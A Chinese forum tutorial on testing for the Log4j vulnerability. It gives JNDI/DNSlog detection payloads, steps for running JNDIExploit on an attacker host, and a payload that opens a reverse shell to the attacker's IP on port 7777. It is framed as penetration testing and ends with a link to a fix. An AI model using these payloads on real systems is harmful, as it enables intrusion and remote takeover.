优化Log4j漏洞测试方法

DNSlog漏洞探测

云端攻击机kali:1x.xxx.xx2.9
目标机:xxx.cn
中转文件:JNDIExploit-1.2-SNAPSHOT.jar

1.1 Payload描述

在log4j漏洞中,常见payload为 ${jndi:ldap://6bbs.dnslog.cn/test}。但由于其中存在//可能被系统误解为URL链接,故我们可以采用以下新的payload进行测试:${jndi:ldap://${sys:java.version}.335h25.dnslog.cn}。此payload可展示版本信息,若成功显示则证明存在漏洞。

1.2 测试

申请一个域名:gx.dnslog.cn

构造payload:${jndi:ldap://${sys:java.version}.gx.dnslog.cn}

图片[1]-优化Log4j漏洞测试方法-山海云端论坛

执行后,检查DNSLOG平台是否有数据,若有则证明存在漏洞。

图片[2]-优化Log4j漏洞测试方法-山海云端论坛

2. log4j RCE

云端攻击机kali:1×3.xxx.xx2.9
目标机:xxx.com
中转文件:JNDIExploit-1.2-SNAPSHOT.jar

2.1 准备工作

在攻击机上运行JNDIExploit-1.2-SNAPSHOT.jar,命令如下:

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 攻击机ip地址

图片[3]-优化Log4j漏洞测试方法-山海云端论坛

通过漏洞探测得知目标存在log4j漏洞,直接构造exp:${jndi:ldap://攻击机ip:1389/Basic/ReverseShell/攻击机ip/7777},并在攻击机上监听7777端口。

图片[4]-优化Log4j漏洞测试方法-山海云端论坛
图片[5]-优化Log4j漏洞测试方法-山海云端论坛

2.2 攻击测试

在输入框中输入构造好的exp,

图片[6]-优化Log4j漏洞测试方法-山海云端论坛

执行后可获取shell。

图片[7]-优化Log4j漏洞测试方法-山海云端论坛

通过cat /proc/1/cgroup判断当前为物理机还是Docker。

图片[8]-优化Log4j漏洞测试方法-山海云端论坛

测试结束,进行报告撰写。

3. 漏洞修复

请参考https://mp.weixin.qq.com/s/O22KoaKFE11dmAR3DVPqB。

© 版权声明
THE END
喜欢就支持一下吧
点赞8 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容